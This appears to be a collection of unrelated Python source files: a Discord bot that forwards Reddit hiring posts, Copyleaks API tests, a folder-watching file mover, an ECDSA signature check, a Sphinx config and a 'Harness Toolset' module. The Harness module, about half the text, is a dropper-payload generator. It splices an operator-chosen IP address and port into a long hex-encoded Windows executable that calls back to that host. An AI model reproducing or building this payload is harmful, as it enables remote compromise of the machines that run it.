logging.info("[AlienVault] OTX Searching %s" % IP)
result = pformat(otx.get_indicator_details_full(IndicatorTypes.IPv4, IP))
otrs_functions.UpdateTicket("","AlienVault OTX - %s Results" % IP, result, TicketID)
|
py | 7dfaa60739b569f0af53886af9d552e9f3ade4bb | #! usr/bin/env python3
import asyncio
import logging
import pprint
import time
from datetime import datetime
import asyncpraw
import asyncprawcore
import discord
from discord.ext import commands, tasks
import commands as bot_commands
from core.config import (
DEXTER_ADMIN_ROLE_ID,
DEXTER_CHANNEL_LOGS_ID,
CLIENT_ID,
CLIENT_SECRET,
DATABASE_NAME,
DEXTER_DISCORD_GUILD_ID,
DEXTER_ID,
DISCORD_TOKEN,
REDDIT_PASSWORD,
REDDIT_USER,
)
from db.mongodb import get_database
from db.mongodb_init import close_mongo_connection, connect_to_mongo
pp = pprint.PrettyPrinter(indent=4)
logFormatter = logging.Formatter(
"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s"
)
rootLogger = logging.getLogger()
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
rootLogger.setLevel(logging.INFO)
illegal_char_list = [".", ",", "!", "?", "[", "]"]
reddit = asyncpraw.Reddit(
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
user_agent="Reddit Job Finder Discord Bot",
username=REDDIT_USER,
password=REDDIT_PASSWORD,
)
client = commands.Bot(command_prefix="$sudo", help_command=None)
@client.event
async def on_ready():
connect_to_mongo()
print(f"{client.user} is connected to the following guild:\n")
for guild in client.guilds:
print(f"{guild.name}(id: {guild.id})")
def build_discord_embed_message(submission, keyword):
title = submission.title
if len(title) > 256:
title = submission.title[:252] + "..."
description = submission.selftext
if len(description) > 2048:
description = submission.selftext[:2044] + "..."
embed = discord.Embed(
title=f"{title}",
color=discord.Colour(0x82DE09),
url=f"https://www.reddit.com{submission.permalink}",
description=f"{description}",
)
embed.set_author(name=f"{submission.author.name}")
embed.set_footer(
text=f"Subreddit {submission.subreddit_name_prefixed} "
f'| {time.strftime("%a %b %d, %Y at %H:%M:%S", time.gmtime(submission.created_utc))}'
)
try:
embed.set_thumbnail(url=f'{submission.preview["images"][0]["source"]["url"]}')
except AttributeError:
pass
embed.add_field(name="#️⃣", value=f"{keyword.capitalize()}", inline=False)
embed.add_field(name="👍", value=f"{submission.ups}", inline=True)
embed.add_field(name="👎", value=f"{submission.downs}", inline=True)
embed.add_field(name="💬", value=f"{submission.num_comments}", inline=True)
return embed
def build_discord_embed_logs(e):
embed = discord.Embed(
title=f"🚑 {e}",
color=discord.Colour(0xE74C3C),
description=f"{e.__doc__}",
)
return embed
async def send_discord_message(submission, keyword, channel_id):
channel = client.get_channel(channel_id)
await channel.send(embed=build_discord_embed_message(submission, keyword))
# print(f'Link : https://www.reddit.com{submission.permalink}')
async def mention_admin_in_case_of_exceptions(e):
channel = client.get_channel(DEXTER_CHANNEL_LOGS_ID)
guild = client.get_guild(id=DEXTER_DISCORD_GUILD_ID)
admin = discord.utils.get(guild.roles, id=int(DEXTER_ADMIN_ROLE_ID))
await channel.send(
f"{admin.mention} I'm sick, please help me!",
embed=build_discord_embed_logs(e),
)
async def search_for_illegal_words_and_trigger_message_sending(
word, keyword_job, submission, sent_submission_id_list, conn, channel_id
):
for illegal_char in illegal_char_list:
word = word.replace(illegal_char, "")
if (
word.lower() == keyword_job.lower()
and submission.id not in sent_submission_id_list
):
await send_discord_message(submission, keyword_job, channel_id)
sent_submission_id_list.append(submission.id)
submission_json = {
"submission_permalink": submission.permalink,
"submission_id": submission.id,
"created_at": datetime.now(),
}
await conn[DATABASE_NAME]["submission"].insert_one(submission_json)
@tasks.loop(seconds=10.0)
async def search_subreddits():
await client.wait_until_ready()
connect_to_mongo()
conn = get_database()
for guild in client.guilds:
db_channel = await conn[DATABASE_NAME]["channel"].find_one(
{"guild_id": guild.id}
)
if db_channel is None or db_channel["channel_id"] is None:
print("Pass, channel not set")
else:
channel_id = int(db_channel["channel_id"])
subreddit_raw_list = conn[DATABASE_NAME]["subreddit"].find(
{"guild_id": guild.id}
)
job_keyword_raw_list = conn[DATABASE_NAME]["job_keyword"].find(
{"guild_id": guild.id}
)
job_keyword_list = []
sent_submission_raw_list = conn[DATABASE_NAME]["submission"].find()
sent_submission_id_list = []
async for submission in sent_submission_raw_list:
sent_submission_id_list.append(submission["submission_id"])
async for job_keyword_obj in job_keyword_raw_list:
job_keyword_list.append(job_keyword_obj)
async for subreddit_obj in subreddit_raw_list:
try:
subreddit = await reddit.subreddit(subreddit_obj["subreddit"])
async for submission in subreddit.new(limit=10):
for job_keyword_obj in job_keyword_list:
job_keyword = job_keyword_obj["job_keyword"]
if submission.link_flair_text:
if (
"hiring" in submission.link_flair_text.lower()
and submission.id not in sent_submission_id_list
):
for word in submission.permalink.replace(
"/", "_"
).split("_"):
await search_for_illegal_words_and_trigger_message_sending(
word,
job_keyword,
submission,
sent_submission_id_list,
conn,
channel_id,
)
for word in submission.selftext.split(" "):
await search_for_illegal_words_and_trigger_message_sending(
word,
job_keyword,
submission,
sent_submission_id_list,
conn,
channel_id,
)
except asyncprawcore.exceptions.ServerError as e:
if not bot_commands.SNOOZE:
await mention_admin_in_case_of_exceptions(e)
await asyncio.sleep(10)
except Exception as e:
if not bot_commands.SNOOZE:
await mention_admin_in_case_of_exceptions(e)
await asyncio.sleep(10)
@commands.command(name="_exit")
async def graceful_exit(ctx):
if ctx.message.author.id == DEXTER_ID:
close_mongo_connection()
await client.close()
else:
await ctx.send(
"```Why the fuck are you trying to kill me?\n"
"Only Dexter#4335 is allowed to do this.\n"
"If you have any problem please, contact him!```"
)
client.add_command(bot_commands.ping)
client.add_command(bot_commands.snooze)
client.add_command(bot_commands.custom_help)
client.add_command(graceful_exit)
client.add_command(bot_commands.subreddit)
client.add_command(bot_commands.job_keyword)
client.add_command(bot_commands.channel)
search_subreddits.start()
client.run(DISCORD_TOKEN)
|
py | 7dfaa611c1a3adf4dbe61ae832f4774c9a48eff6 | '''
The MIT License(MIT)
Copyright(c) 2016 Copyleaks LTD (https://copyleaks.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import unittest
from copyleaks.copyleakscloud import CopyleaksCloud
from copyleaks.models.processoptions import ProcessOptions
from copyleaks.models.eocrlanguage import eOcrLanguage
class CreateProcessTests(unittest.TestCase):
def setUp(self):
self.cloud = CopyleaksCloud('<YOUR_EMAIL_HERE>', '<YOUR_API_KEY_HERE>')
self.options = ProcessOptions()
self.options.setSandboxMode(True)
pass
def tearDown(self):
pass
def testCreateByUrl(self):
proc = self.cloud.createByUrl('http://python.org', self.options)
self.assertGreater(len(proc.getPID()), 0)
pass
def testCreateByFile(self):
proc = self.cloud.createByFile('files/lorem.txt', self.options)
self.assertGreater(len(proc.getPID()), 0)
pass
def testCreateByOcr(self):
proc = self.cloud.createByOcr('files/lorem.jpg', eOcrLanguage.English, self.options)
self.assertGreater(len(proc.getPID()), 0)
pass
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testCreateByFile']
unittest.main() |
py | 7dfaa69589fa3081d9ddaa267eda92a51522293f | # Jacob Mannix [8-18-20]
# Import Dependencies
from watchdog.observers import Observer
import time
from watchdog.events import FileSystemEventHandler
import os
import json
class MyHandler(FileSystemEventHandler):
i = 0
def on_modified(self, event):
new_name = "new_file_" + str(self.i) + ".txt"
for filename in os.listdir(folder_to_track):
file_exists = os.path.isfile(folder_destination + "/" + new_name)
while file_exists:
self.i += 1
new_name = "new_file_" + str(self.i) + ".txt"
file_exists = os.path.isfile(folder_destination + "/" + new_name)
src = folder_to_track + "/" + filename
new_destination = folder_destination + "/" + new_name
os.rename(src, new_destination)
folder_to_track = '/Users/jacobmannix/Desktop/Folder1'
folder_destination = '/Users/jacobmannix/Desktop/Folder2'
event_handler = MyHandler()
observer = Observer()
observer.schedule(event_handler, folder_to_track, recursive = True)
observer.start()
try:
while True:
time.sleep(10)
except KeyboardInterrupt:
observer.stop()
observer.join()
|
py | 7dfaa7fe2e9797579a093b462824a50347205b49 | from unittest import TestCase
from mock import Mock
from parameterized import parameterized
from grafy.api.transmitters import Point
class PointTest(TestCase):
@parameterized([
(1, 2),
(3, 4),
(-5, -6),
(8, 20),
])
def test_fabricRandomPoint(self, circleRadius, weight):
p = Point.fabricRandomPoint(20, 10)
print(p)
expectedX = 20
expectedY = 10
self.assertEqual(p.x, expectedX)
self.assertEqual(p.y, expectedY)
class CircleCalculatorTest(TestCase):
def setUp(self):
self.point = Mock() #type: Point
self.point.x = 5
self.point.y = 20
def test_checkCoordinatesOfPointInCircle_shouldPass(self):
pass
def test_checkPointIsInCircle_shouldPass(self):
pass
def test_checkEdgeBetweenPointsExists_(self):
pass |
py | 7dfaa8a2825cbb831bef5a4a3f2e33be8d3ee909 | from blake3 import blake3
import ecdsa
import json
import hashlib
from datetime import datetime
# msg = bytes("hello world", "utf-8")
# print("The hash of 'hello world' is", blake3(msg).hexdigest())
# print("print keys here")
# def generate_keys():
# private_key = ecdsa.SigningKey.generate(curve=ecdsa.SECP256k1)
# public_key = private_key.get_verifying_key()
# return public_key.to_string().hex(), private_key.to_string().hex()
# public_key, private_key = generate_keys()
# print("public key", public_key)
# print("\n")
# print("private key", private_key)
# def calculateHash(sender, receiver, amt, time):
# hashString = sender + receiver + str(amt) + str(time)
# hashEncoded = json.dumps(hashString, sort_keys=True).encode()
# return blake3(hashEncoded).hexdigest()
# time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
# sender = "me"
# receiver = "you"
# amt = 10
# print(calculateHash(sender, receiver, amt, time))
from hashlib import sha256
message = b"message"
public_key = '98cedbb266d9fc38e41a169362708e0509e06b3040a5dfff6e08196f8d9e49cebfb4f4cb12aa7ac34b19f3b29a17f4e5464873f151fd699c2524e0b7843eb383'
sig = '740894121e1c7f33b174153a7349f6899d0a1d2730e9cc59f674921d8aef73532f63edb9c5dba4877074a937448a37c5c485e0d53419297967e95e9b1bef630d'
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1, hashfunc=sha256) # the default is sha1
print(vk)
print("\n")
print(vk.verify(bytes.fromhex(sig), message) )
|
py | 7dfaa94ac2a5e4f1844d37cc8b9ea7ce76f4437c | from .casia import CASIA_Face
|
py | 7dfaa98ee785b52dae6ad41f9332352ab5f3c553 | # -*- coding: utf-8 -*-
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("../../src"))
# -- Project information -----------------------------------------------------
project = "Poke-env"
copyright = "2019, Haris Sahovic"
author = "Haris Sahovic"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ["sphinx.ext.autodoc"]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
master_doc = "index"
|
py | 7dfaabf4cdc0d4b57c4b1d90f625506c99b287fb |
'''
Harness Toolset
Copyright (c) 2014 Rich Kelley, RK5DEVMAIL[A T]gmail[D O T]com
'''
from harness.core import module
class Module(module.ModuleFrame):
about = {
'name': 'Harness_x86',
'info': 'Generate Dropper (x86) payload (exe)',
'author': 'Rich',
'contact': '@RGKelley5',
'version': '1.0'
}
def __init__(self):
module.ModuleFrame.__init__(self, self.about)
self.add_option('IP', "0.0.0.0", "str")
self.add_option('PORT', "80", "int")
def run_module(self):
PORT = self.options.PORT
IP = self.options.IP
ip_hex = ["{:02x}".format(i) for i in map(int, IP.split("."))]
_port = format(PORT, "04x")
port_hex = [_port[i:i+2] for i in range(0, len(_port), 2)]
port_hex.reverse()
raw_code = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103009fb304560000000000000000e00002010b010b00004c00000006000000000000ee6a000000200000008000000000400000200000000200000400000000000000040000000000000000c000000002000000000000020040850000100000100000000010000010000000000000100000000000000000000000986a00005300000000800000d80200000000000000000000000000000000000000a000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000f44a000000200000004c000000020000000000000000000000000000200000602e72737263000000d80200000080000000040000004e0000000000000000000000000000400000402e72656c6f6300000c00000000a0000000020000005200000000000000000000000000004000004200000000000000000000000000000000d06a000000000000480000000200050008370000903300000300000006000006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
raw_code += "".join(ip_hex) # ip
raw_code += "13300400cb0000000100001102177d0100000402177d05000004021a8d3400000125d028000004281100000a7d06000004021a8d340000010a067d070000040220"
raw_code += "".join(port_hex) # port
raw_code += "00007d080000040220401f00007d0900000402281200000a000002167d04000004020273100000067d0c00000402281300000a7d0f000004027b0f000004146f1400000a0002027b0c000004027b0f000004281500000a7d0d000004027b0d000004196f1600000a00027b0d0000046f1700000a0002281800000a7d0e000004027b0e000004027b0d0000046f1900000a00002a00133001000c0000000200001100027b0a0000040a2b00062a260002037d0a0000042a0000133001000c0000000300001100027b0b0000040a2b00062a260002037d0b0000042a00001330020031000000040000110073010000060a00066f0700000600067b04000004281a00000a0000067b0400000416fe020b072dde066f08000006002a00000013300400e902000005000011001f5e0a72010000700b720b0000700c72170000700d161304161305721f0000701307721f0000701308020228090000067d030000040202027b03000004027b0100000473500000067d02000004388302000000027b020000046f5300000616fe01130a110a3a6a02000000027b030000046f1b00000a8d340000011306382002000000110416fe01130a110a2d5d00281c00000a11061611096f1d00000a6f1e00000a13081108068c3f00000109281f00000a282000000a16fe01130a110a2d1700021107280d00000600161304721f0000701307002b0d0011071108282100000a130700003869010000110516fe01130a110a3a9e00000000281c00000a11061611096f1d00000a6f1e00000a130811086f2200000a08282000000a16fe01130a110a2d5700282300000a1107282400000a6f2500000a1307021107280b00000616fe01130a110a2d0d00021107280d00000600002b1800027b0c0000046f2600000a72210000706f2700000a0000721f0000701307161305002b140011071108282100000a1307721f0000701308000038bd00000000281c00000a11061611096f1d00000a6f1e00000a130711076f2200000a7279000070282000000a2d1611076f2200000a7283000070282000000a16fe012b011600130a110a2d0d0002167d0400000438da00000011076f2200000a07282000000a16fe01130a110a2d0c00171305721f0000701307001107282800000a2d0411052b011700130a110a2d30001107166f2900000a06fe0116fe01130a110a2d1a00021107280c000006130a110a2d03002b7c721f00007013070000001105130a110a2d4500021107280b00000616fe01130a110a2d1700021107280d00000600721f0000701307161304002b1b00171304027b0c0000046f2600000a728d0000706f2a00000a00000000027b0200000411061611068e696f5500000625130916fe0116fe01130a110a3abcfdffff027b030000046f2b00000a002b130002280200000616fe01130a110a3a6bfdffff2a6a00027b0d0000046f2c00000a00027b0e0000046f2d00000a002a1b300300380000000600001100732e00000a0a00027b06000004732f00000a0b0607027b080000046f3000000a0000de0c0c0017283100000a0000de0000060d2b00092a01100000000007001e25000c430000011b300200460000000700001100027b07000004732f00000a0a06027b09000004733200000a0b076f3300000a00140c00076f3400000a0c081304de120d0017283100000a0000de00000813042b000011042a000001100000000023000d30000c43000001133002002b0000000800001100733500000a0a031200283600000a0b066f3700000a16fe0216fe010d092d0500160c2b04170c2b00082a0013300400690300000900001100721f0000700a170b0317036f3800000a17596f3900000a1001036f2200000a178d3f000001130f110f161f209d110f6f3a00000a100103178d3f000001130f110f161f209d110f6f3b00000a0c08169a1310111039eb02000011107295000070282000000a2d21111072b1000070282000000a2d25111072cf000070282000000a2d2938bc02000002177d0500000472db0000700a38aa02000002167d0500000472050100700a3898020000283c00000a0d72330100701307088e6918fe0116fe01131111113a900100000008179a166f2900000a1f2bfe0116fe01131111113a6c0100000008179a08179a6f3800000a17596f2900000a131211121f68301111121f642e2211121f682e67383d01000011121f6d3ba400000011121f733be3000000382601000008179a1708179a6f3800000a18596f3900000a1208283d00000a16fe01131111112d2300283c00000a131312131108283e00000a13131213fe16480000016f3f00000a13070038db00000008179a1708179a6f3800000a18596f3900000a1209283d00000a16fe01131111112d2300283c00000a131312131109284000000a13131213fe16480000016f3f00000a130700389000000008179a1708179a6f3800000a18596f3900000a120a283d00000a16fe01131111112d2300283c00000a13131213110a284100000a13131213fe16480000016f3f00000a1307002b4808179a1708179a6f3800000a18596f3900000a120b283d00000a16fe01131111112d2300283c00000a13131213110b284200000a13131213fe16480000016f3f00000a1307002b00002b070008179a130700002b23088e6919fe0116fe01131111112d140008179a724701007008189a284300000a13070011071204284400000a16fe01131111113a9b00000000110409284500000a130c120c284600000a230000000000000000fe0416fe01131111112d1900120c230000000000003840284700000a284800000a130c00120c284600000a130d110d284900000a13051203110d284a00000a13061205fe164a0000016f3f00000a0a724b01007006726f0100701206fe16480000016f3f00000a284b00000a0a02120c284600000a697d04000004160b002b1400729701007011076f3f00000a282100000a0a002b00027b0c0000046f2600000a0672d1010070282100000a6f2a00000a0007130e2b00110e2a00000013300400ea0000000a0000110003282800000a0d093a8900000000027b0e000004036f4c00000a26027b0500000416fe010d092d1300027b0e00000472d70100706f4d00000a2600734e00000a0a0602fe060e000006734f00000a6f5000000a00027b0e0000046f5100000a6f5200000a02fe060f000006734f00000a6f5300000a00027b0e00000414066f0100002b0b2b020000076f5500000a16fe010d092df100027b0e0000046f5600000a6f5700000a6f5800000a6f5900000a6f3f00000a0c027b0c0000046f2600000a72ed0100700872f5010070284300000a6f2a00000a00027b0e0000046f5a00000a6f5b00000a002a00001b3002005b0000000b0000110003740200001b0a066f5c00000a0b00076f5d00000a0d2b20096f5e00000a0c00027b0c0000046f2600000a086f3f00000a6f2700000a0000096f5f00000a130411042dd4de120914fe01130411042d07096f6000000a00dc002a00011000000200170030470012000000001b300200750000000c00001100027b0e0000046f5100000a6f5200000a6f6100000a0a027b0e0000046f5100000a6f5200000a6f6200000a0000066f6300000a0c2b20086f6400000a0b00027b0c0000046f2600000a076f3f00000a6f6500000a0000086f5f00000a0d092dd6de100814fe010d092d07086f6000000a00dc002a00000001100000020035002e63001000000000b602286600000a7d1100000402286700000a000002037d1000000402027b10000004731c0000067d12000004002a0000133001000c0000000d00001100027b110000040a2b00062a133001000b0000000e0000110072fb0100700a2b00062a00133002000d0000000f000011001716736800000a0a2b00062a000000133001000c0000001000001100027b120000040a2b00062a13300100100000001100001100286900000a6f6a00000a0a2b00062a13300100100000001100001100286900000a6f6b00000a0a2b00062a3200720b020070736c00000a7a3200725b020070736c00000a7a12002b002a12002b002a7a00027b10000004176f0300000600027b10000004036f05000006002b002a7202734f0000067d1400000402286d00000a000002037d13000004002a13300400420000001200001100027b130000047b020000046f5400000616fe010b072d2900282300000a036f3f00000a6f6e00000a0a027b130000047b020000040616068e696f5600000600002a3a000272a7020070281d000006002a2a000203281d000006002a5200020572a7020070282100000a281d000006002a2a000205281d000006002a2a000203281d000006002a66000272ab0200700372a7020070284300000a281d000006002a66000272bb0200700372a7020070284300000a281d000006002a66000272cb0200700372a7020070284300000a281d000006002a66000272df0200700372a7020070284300000a281d000006002a12002b002a133001000b0000000e0000110072470100700a2b00062a001b300500a40000001300001100020372a7020070047247010070284b00000a6f2a00000a00736f00000a0a00056f7000000a13052b4d11056f7100000a0b00076f7200000a282b0000060c0208179a6f2700000a00026f7300000a0d0914fe0116fe01130611062d0600141304de3d06076f7400000a09287500000a6f7600000a000011056f5f00000a130611062da6de14110514fe01130611062d0811056f6000000a00dc000613042b000011042a01100000020028005e8600140000000013300600fe0000001400001100020372a70200700472a7020070284b00000a6f2700000a0005282c0000060a737700000a0b160c2b27000772f3020070061608287800000a061708287800000a287900000a6f7a00000a26000817580c08056f7b00000afe04130611062dca07720903007006160e04287800000a287c00000a6f7a00000a262b7a0002076f3f00000a6f2700000a00026f7300000a0d09282800000a16fe01130611062d07000e0413052b541613042b270006161104287800000a09282000000a16fe01130611062d0700110413052b2f001104175813041104056f7b00000afe04130611062dc902722b03007009282100000a6f6500000a00001713062b8111052a0000133005008e0000001500001100188d3e0000010d09167e7d00000aa209177e7d00000aa2090a02178d3f00000113041104161f269d11046f3b00000a0b078e6918fe0116fe01130511052d420007179a6f3800000a16fe0216fe01130511052d1700061607179a166f2900000a13061206287e00000aa200061707169a07179a282100000a6f1e00000aa2002b0600061702a200060c2b00082a00001330050055000000160000110018026f7b00000a737f00000a0a160b2b2e0002076f8000000a6f8100000a282b0000060c06160708169a288200000a06170708179a288200000a000717580b07026f7b00000afe04130411042dc3060d2b00092a000000133009006001000017000011001200fe15050000021200037d180000041200047d1700000412007e8400000a7d160000041200068c05000002288500000a7d15000004160b1202fe155900000120000400000d161304724d0300701305738600000a130612001612017e8400000a1612021203120417282f00000613081f64738700000a13091f64738700000a130a1f64738700000a130b1f64130c1f64130d1f64130e110816fe0116fe01131011103aa2000000001608091109120c110b120d110a120e282e00000616fe01131011102d750008282d00000600110b6f3f00000a130505282800000a131011102d19001105726503007011096f3f00000a284300000a1003002b0b0011096f3f00000a100300110a6f3f00000a6f8800000a1106fe068900000a738a00000a280200002b0011066f8c00000a00051106738d00000a1307002b0c00051106738d00000a130700002b0c00051106738d00000a1307001107130f2b00110f2a13300500110000001800001100020304050e046f8e00000a0a2b00062a000000133001000c0000001900001100027b140000040a2b00062a133004005e0000001a00001100027b130000047b030000046f1b00000a8d340000010b721f0000700c2b1600281c00000a0716066f1d00000a6f1e00000a0c2b23027b130000047b020000040716078e696f55000006250a16fe0116fe01130411042dc7080d2b00092a32007269030070736c00000a7a00133001000c0000001b00001100027b1e0000040a2b00062a260002037d1e0000042a0000133001000c0000001c00001100027b210000040a2b00062a260002037d210000042a0000133001000c0000001d00001100027b1b0000040a2b00062a260002037d1b0000042a0000133001000c0000000300001100027b1c0000040a2b00062a260002037d1c0000042a320072bf030070736c00000a7a00133001000c0000001b00001100027b1d0000040a2b00062a260002037d1d0000042a32007209040070736c00000a7a32007255040070736c00000a7a133001000c0000001c00001100027b1f0000040a2b00062a133001000c0000001c00001100027b200000040a2b00062a32007297040070736c00000a7a320072cf040070736c00000a7a3200721f050070736c00000a7a3200726b050070736c00000a7a133001000c0000001d00001100027b220000040a2b00062a260002037d220000042a0000133001000c0000001c00001100027b1a0000040a2b00062a260002037d1a0000042a0000133001000c0000000e00001100027b230000040a2b00062a260002037d230000042a000013300300020100001e000011021200fe151a00000112001f78289000000a0012001f64289100000a00067d1a000004021201fe151b000001120116289200000a00120116289300000a00077d1b00000402177d1c000004021f0f7d1d00000402167d1e000004021202fe151a000001120220ffffff7f289000000a00120220ffffff7f289100000a00087d1f000004021203fe151a00000112031f64289000000a0012031f64289100000a00097d20000004021204fe151a00000112041f64289000000a00120420e8030000289100000a0011047d21000004021205fe151b000001120516289200000a00120516289300000a0011057d220000040272470100707d2300000402289400000a002a000013300500750000000200001102281200000a00000516fe010a062d4e0002046f9500000a1602fe0651000006739600000a14739700000a7d2500000402037d27000004027b2500000402027b270000047b0600000428520000066f9800000a0002177d26000004002b150002046f9500000a7d2400000402167d2600000400002a00000013300100070000000200001100170a2b00062a00133003004e0000001f00001100721f0000700a160b2b33000603078f34000001289900000a282100000a0a07038e691759fe010d092d0e000672b5050070282100000a0a00000717580b07038e69fe040d092dc3060c2b00082a0000133002002e0000002000001100027b2600000416fe010b072d0f00027b250000046f9a00000a0a2b0f00027b240000046f9a00000a0a2b00062a0000133002002e0000002000001100027b2600000416fe010b072d0f00027b250000046f9b00000a0a2b0f00027b240000046f9b00000a0a2b00062a000013300400380000002100001100027b2600000416fe010b072d1400027b250000040304038e696f9c00000a0a2b1400027b240000040304038e696f9c00000a0a2b00062a13300400370000000200001100027b2600000416fe010a062d1500027b250000040304038e696f9d00000a00002b1300027b240000040304038e696f9d00000a00002a0042534a4201000100000000000c00000076322e302e35303732370000000005006c00000068110000237e0000d41100007c15000023537472696e67730000000050270000bc050000235553000c2d00001000000023475549440000001c2d00007406000023426c6f6200000000000000020000015715a23d090a000000fa2533001600000100000060000000080000002800000056000000670000009d0000000d0000002100000004000000150000001f000000020000000e00000004000000010000000100000003000000040000000200000000000a0001000000000006008c0085000a00d200b0000a00d900b0000600ed0085000a00f700b0000e002f011c010a00bf0198010a00d30193000a00e10198010a00800293000600d20285000600fb02850006002b03160306000b0485000a005e0493000600a10486040a00ae0493000600d604b7040a00e304b0000a00fb04b0000600640558050a00d00593000a00f10593000a000306930006003c062c060a00a706b0000a00b806b0000a001408b0000a001f08b0000a007808b0000a008008b0000e00be091c010e00ed09d9090600330a050a0e00430a050a0e004d0ad9090600180cf90b06002e0d1c0d0600450d1c0d0600620d1c0d0600810d1c0d06009a0d1c0d0600b30d1c0d0600ce0d1c0d0600e90d1c0d0600020ef90b0600160ef90b0600240e1c0d06003d0e1c0d06007a0e5a0e06009a0e5a0e0600b80e85000600020f5a0e0600310f5a0e0600400f85000600460f85000a00770f93000a00a50f98010a00c40f980106001010ff0f06003310580506005010850006005c1085000600851085000e00cf10c4100600e11085000600f21085000e00fc101c010a001e1193000a002b1193000a00341193000600721185000600831185000600c31185000a00351293000600481285000a00651293000a007f1293000600951285000a00cb1298010a00f31293000a000b1393000a0032139300060057138604060092137f130600a71385000600cd13850006003114f90b06005914850006006514f90b06008b1485000600a914f90b0600bf14f90b0e00f514d9090600231519150e002a15d90900000000010000000000010001000100100016001600050001000100030010001e000000090010001000030010002b0000000d0013001c000b01120045000000110015003600030010005100000015001a003600010010006f00160005002400500000000000bd0e000005002800570001000e011300060015011600010039011a00010040011e0001004601130006004d01210006005c01210006006a011e00060075011e0001007f01130001008a011e000100930125000100c80129000100de012d000100f50131000100ca026f000100d70273000100df0277000100ca026f000100ef03b10006006d061e0006007406540106007f06570106008e06570106009d0654010100ac065a010100c4065e010100d4061e000100e00662010100f1066201010002075a01010019075a01010028075a01010034075e010100440757010100cc09cc010100f709d10101000e0113000100ca026f0013011d0f1e005420000000008118fb01350001002c21000000008608010239000100442100000000860810023d00010050210000000086081f024200020068210000000086082c0246000200742100000000910039024b000300b4210000000081003e0235000400a924000000008100420235000400c4240000000081004a025100040018250000000081005702510004007c25000000008100610256000400b4250000000081006902560005002c2900000000810076025b000600242a0000000081009302600007009c2a000000008100a60260000900302b000000008618fb017b000b00602b00000000c608e30281000c00782b00000000c608f20286000c00902b00000000c60803038a000c00ac2b00000000c6080f038f000c00c42b00000000c608370394000c00e02b00000000c6084a0394000c00fc2b00000000c6005f0335000c00092c00000000c600710335000c00162c00000000c600820335000c001b2c00000000c600990335000c00202c00000000c600ae0346000c003f2c000000008618fb017b000d005c2c000000008100f6035b000e00aa2c00000000c600010435000f00b92c00000000c60001045b000f00c42c00000000c6000104b5001000d92c00000000c6001804b5001300e42c00000000c60018045b001600ef2c00000000c6001e045b001700092d00000000c6002d045b001800232d00000000c6003c045b0019003d2d00000000c6004d045b001a00572d00000000c6006d04be001b005c2d0000000086087b0486001d00742d00000000c600f404c5001d00342e00000000c6000d05d7002000402f0000000091001d05e4002400dc2f0000000091002f05ea00250000000000800096204a05fa00260000000000800091207205ff00270000000000800091209105120130000000000080009120b30525013900403000000000c600dd052f013e00ac3100000000c600dd0538014200cc3100000000c608190645014800e43100000000c6002306860048004e3200000000c60049064a0148005c3200000000c608510766014800743200000000c60865076b014800803200000000c608790771014900983200000000c608880776014900a43200000000c60897077c014a00bc3200000000c608aa0781014a00c83200000000c608bd0742004b00e03200000000c608cc0746004b00ea3200000000c600db0735004c00f83200000000c608ec0766014c00103300000000c60800086b014c001a3300000000c600290887014d00273300000000c6083b0839004e00343300000000c6084c0871014e004c3300000000c608660871014e00643300000000c6008f0894014e00713300000000c60097089b014f007e3300000000c600ac08a70153008b3300000000c600ac08af015500983300000000c608be087c015700b03300000000c608d10881015700bc3300000000c608e40871015800d43300000000c608f30876015800e03300000000c608020986005900f83300000000c60812095b0059000434000000008618fb0135005a001435000000008618fb01d6015a0098350000000081005d0adf015d00ac35000000008100770aed0161000836000000008600890a390062004436000000008600910a3900620080360000000086009a0af3016200c4360000000086001804fb016500000001009f0a000001009f0a00000100a50a00000100aa0a00000100af0a00000100aa0a00000100b30a00000200ba0a00000100b30a00000200ba0a00000100ca02000001008a